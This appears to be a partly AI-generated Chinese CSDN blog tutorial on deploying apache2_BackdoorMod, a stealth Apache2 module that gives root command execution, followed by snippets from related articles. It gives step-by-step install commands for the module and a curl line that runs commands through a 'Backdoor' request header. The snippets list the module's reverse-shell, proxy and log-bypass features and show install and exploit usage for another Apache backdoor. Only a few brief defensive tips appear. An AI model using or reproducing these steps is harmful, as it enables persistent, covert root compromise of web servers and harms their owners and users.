Apache2 Backdoor 模块使用教程

最新推荐文章于 2024-08-28 08:36:43 发布
最新推荐文章于 2024-08-28 08:36:43 发布
阅读量379 收藏 4
点赞数 4
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/gitblog_01071/article/details/141619904

Apache2 Backdoor 模块使用教程

apache2_BackdoorModA backdoor module for Apache2项目地址:https://gitcode.com/gh_mirrors/ap/apache2_BackdoorMod

项目介绍

Apache2 Backdoor 模块是一个用于 Apache HTTP 服务器的隐形后门。该项目的主要思路是在 Apache2 进程加载其配置后对其进行 fork() 处理,从而允许以 root 身份执行命令。由于 Apache2 仅在 (重新) 启动时才加载其配置,因此需要防止 apache2 进程挂掉以维持权限。

项目快速启动

环境部署

  1. 靶机:Apache kali 172.20.10.3
  2. 攻击机:mac 172.20.10.11

安装步骤

  1. 克隆项目仓库:

    git clone https://github.com/VladRico/apache2_BackdoorMod.git

  2. mod_backdoor.so 文件复制到 /usr/lib/apache2/modules/ 目录下:

    cp apache2_BackdoorMod/build/mod_backdoor.so /usr/lib/apache2/modules/

  3. backdoor.load 文件复制到 /etc/apache2/mods-available/ 目录下:

    cp apache2_BackdoorMod/backdoor.load /etc/apache2/mods-available/

  4. 启用模块并重启 Apache2:

    a2enmod backdoor
systemctl restart apache2

应用案例和最佳实践

应用案例

攻击者在目标服务器植入后门后,一旦攻击者向服务器发送的 HTTP 请求存在 Backdoor 这个请求头,请求头的值将作为命令执行。例如:

curl -H "Backdoor: whoami" http://target-server

最佳实践

  1. 安全审计:定期对 Apache 服务器进行安全审计,检查是否存在未授权的模块加载。
  2. 权限管理:确保只有授权用户可以访问和修改 Apache 配置文件。
  3. 监控日志:实时监控 Apache 访问日志,及时发现异常请求。

典型生态项目

相关项目

  1. mod_ringbuilder:由 Juan Manuel Fernandez 创建的 Apache 模块,用于创建后门。
  2. microsocks:一个轻量级的 SOCKS5 服务器。

通过以上步骤和案例,您可以快速了解和使用 Apache2 Backdoor 模块,并结合相关生态项目进行更深入的安全研究和实践。

apache2_BackdoorModA backdoor module for Apache2项目地址:https://gitcode.com/gh_mirrors/ap/apache2_BackdoorMod

创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

华为HCIP Datacom H12-821 卷34
QIN_yuexiang的博客
07-10 700
如图所示,PE1和 PE2之间通过LoopBack0接口建立sham link, CE2可以通过shamlink 和 backdoor 链路学习到192.168.1.0/24 网段(CE1上的直连路由)的路由,在其他参数均保持缺省配置的情况下,CE2上到192.168.1.0/24网段的路由的cost 值应该为( )(请直接填写阿拉伯数字,不要有符号)如图所示的网络,R1和R2运行OSPF协议,R1的Router-ID为10.0.1.1,R2的Router-ID为10.0.2.2
apache2_BackdoorMod:Apache2的后门模块
04-15
Apache2的mod_backdoor mod_backdoor使用Apache2模块的隐形后门。 主要思想是在主Apache2进程加载其配置后对其进行fork()处理。 由于它是在root用户将进程转移到www-data之前创建的,因此您可以root身份执行命令。 由于Apache2仅在(重新)启动时才加载其配置,因此面临的挑战是永不让这个分叉的root apache2进程死亡,让我们以root用户身份与受感染的系统进行交互。 特征 绑定TTY外壳 反向Shell(TTY,本机,PHP,Perl,Python,Ruby) 高度的稳定性和可靠性,每个外壳产生一个新的分叉的独立根进程,该进程附加到PID 1,并从apache2 cgroup中删除 Socks5代理 通过Cookie标头进行密码保护 ping模块以了解其是否仍处于活动状态 绕过日志记录机制。 Apache2不会记录对后
应急响应之apache日志分析及web后门排查
总有人间一两风,填我十万八千梦
07-02 8297
目录 WEB日志 Apache日志 日志分析工具 webshell检测工具 应急响应中很重要的就是能够进行日志分析,所以需要我们能够看懂日志,根据日志信息去判断是否存在攻击行为,我们先看下常见的web服务器的日志文件位置。 WEB日志 Web访问日志记录了Web服务器接收处理请求及运行时错误等各种原始信息。通过对WEB日志进行的安全分析,不仅可以帮助我们定位攻击者,还可以帮助我们还原攻击路径,找到网站存在的安全漏洞并进行修复。 常见的服务搭建平台如下: Apache日志 日志文件路径
Apache2 Backdoor Mod 项目教程
最新发布
gitblog_00787的博客
08-28 455
Apache2 Backdoor Mod 项目教程 apache2_BackdoorModA backdoor module for Apache2项目地址:https://gitcode.com/gh_mirrors/ap/apache2_BackdoorMod 1. 项目的目录结构及介绍 Apache2 Backdoor Mod 项目的目录结构如下: apache2_BackdoorMod/...
linux 端口复用后门,那些年系列 0x02---基于端口复用的apache后门的调试与使用
weixin_42122986的博客
05-11 575
【*】作者:小飞【*】QQ 5119187此为系列教材,分为三个部分0x01---后门隐藏技术的攻与防0x02---基于端口复用的apache模块后门 mod_rootme的调试与使用0x03---LKM rootkit的编译与使用-----------------------------------------------0x02---基于端口复用的apache模块后门 mod_rootme的调...
linux 端口复用后门,Apache端口复用后门 | CN-SEC 中文网
weixin_33612966的博客
05-11 621
摘要Apache2.5利用方式先修改后门的里面的httpd22.h文件,不修改的话,在apache启动的时候会报错测试环境CentOSx64 6.5Apache2.5利用方式先修改后门的里面的httpd22.h文件,不修改的话,在apache启动的时候会报错将: #define MODULE_MAGIC_COOKIE 0x41503230UL 改为: #define MODULE_MAGIC_CO...
揭秘Apache后门攻击:Tunnel Backdoor的运作原理
根据提供的文件信息,我们可以展开关于“Apache Tunnel Backdoor”的知识点讨论,这包括了该恶意软件的特征、识别方法以及防护措施。此外,还将简要分析提及的压缩包子文件的文件名列表内容。 ### Apache Tunnel ...
40.网络安全渗透测试—[穷举篇3]—[KALI的Metasploit穷举模块使用]
qwsn
08-06 2670
一、Metasploit的相关概念/下载地址/安装配置步骤 1、Metasploit相关概念: 2、Windows-Metasploit下载地址: 3、安装步骤: 4、配置步骤: 5、无需配置: 二、Kali Metasploit 穷举模块使用 1、kali打开工具的方法:`msfconsole` 2、部分穷举模块:`auxiliary/scanner目录下` 3、用法示例:`以mysql为例` 三、Windows Metasploit 穷举模块使用 四、`所有的穷举模块`
phpStudy backdoor 2019后门漏洞复现过程记录
牛奶栗的小博客
11-11 1019
1)可以通过查看路径为PHPTutorial/php/php-5.4.45/ext/php_xmlrpc.dll的文件,查找到@eval(%s('%s'));4、打开Burpsuite抓phpinfo.php页面的请求包,发送到Repeater重放器模块。部署在win10虚拟机里,解压后运行后访问localhost/phpinfo.php即成功安装。3)查看php.ini文件,检索到extension=php_xmlrpc.dll。2)查看php探针→PHP已编译模块检测,存在xmlrpc。
渗透之——Metasploit攻击VSFTPD2.3.4后门漏洞并渗透内网
冰河的专栏
01-12 6173
转载请注明出处:https://blog.youkuaiyun.com/l1028386804/article/details/86357202 攻击机:Kali 192.168.109.137 靶机:Metasploitable2 192.168.109.140 内网另一主机: Metasploitable2 192.168.109.159 工具:Metasploit 1.开启MSF msfc...
Apache-HTTP-Server-Module-Backdoor:用C语言编写的Apache HTTP服务器的后门程序
05-16
Apache_HTTP_Server_Module_Backdoor 安装: # switch to root user apt install apache2-dev && apxs -i -a -c mod_backdoor.c && service apache2 restart 用法: python exploit.py [HOST] [PORT] 例子: root@kali:~/backdoor# apxs -i -a -c mod_backdoor.c && service apache2 restart /usr/share/apr-1.0/build/libtool --mode=compile --tag=disable-static x86_64-linux-gnu-gcc -prefer-pic -pipe -g -O2 -fstack-protect
CTF线下防御战 — 让你的靶机变成“铜墙铁壁”
Yatere的天平秤
12-21 7564
一. 前言 随着CTF的普及,比赛的形式也有了越来越多的花样,对于线下赛来说,开始出现了安全加固或者防御战之类的环节,亦或者因为拿下靶机后不希望其他攻击者进入而进行“争夺”,无论什么形式,这些都需要我们对于服务器的防护工作有所了解。对于线下赛,笔者虽说没有什么很高超的攻防技巧,但也是有着一些自己的心得。本文总结了一些CTF线下赛中常用的服务器加固姿势,希望能对各位CTF朋友们有所帮助。环境针
WebServer端口复用后门
小威的博客
03-11 2890
0x00 有朋友问到了我一个关于“无端口可用”的问题。说在如下图所示的内网环境中,firewall只允许Web Server的80端口建立网络连接,并且Web Server上的80端口已经被IIS、Apache等软件占用了的情况下,怎么建立一个RAT后门。 0x01 早些时候的著名后门byshell就考虑到了这个问题,于是使用了一种非常挫的方式去解决。客户端将数据发送到8
我今天终于知道后门在代码上是如何实现的
wjp_116的专栏
03-23 5565
我们开发的程序是要在生产一线使用的,这种软件不但要考虑功能,还要考虑到使用者的知识水平和个人素质。总有人喜欢不按规程操作,把这些问题交给管理者去规范是个很挠头的事情。这样只能在代码上进行处理了。比如不能在通信过程中退出程序,否则会造成通信数据的不完整性。而如果有时我们的程序有问题时又确实要在那种情况下退出,这样就需要在代码中增加一部分,只有点击了特定的按钮顺序才能退出程序。当然这部分代码是在我们技
BackDoor
a1b2c3是弱口令
08-08 1742
题目: 下载数据包,发现有菜刀连接的痕迹。 怎么知道的,看数据包吧。追踪tcp流发现连接的痕迹。 右键,追踪tcp流,发现两个加密后的字符串 对字符串进行base64解密,发现菜刀的特征字符: 解密后是这么一段特征字符: @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'...
Linux 多个留后门姿势
热门推荐
3569
08-17 2万+
https://www.anquanke.com/post/id/155943 在一次渗透中,成功获取某目标几台比较重要的机器,当时只想着获取脱库,结果动静太大被发现了,之前渗透并没太在意Linux维持权限,经过此次事后从Google找各种资料,一款满意的rootkit都没有,现在一直在关注这方面,但还是没有找到满意的后门,在渗透圈一个人的资源总是有限往往你全力追求的,也不过是别人的一层关系就可...
一步一步教你使用CGI实现一个简单的后门
meishadevs的个人博客
11-21 7158
程序实例1:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

俞兰莎Rosalind

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值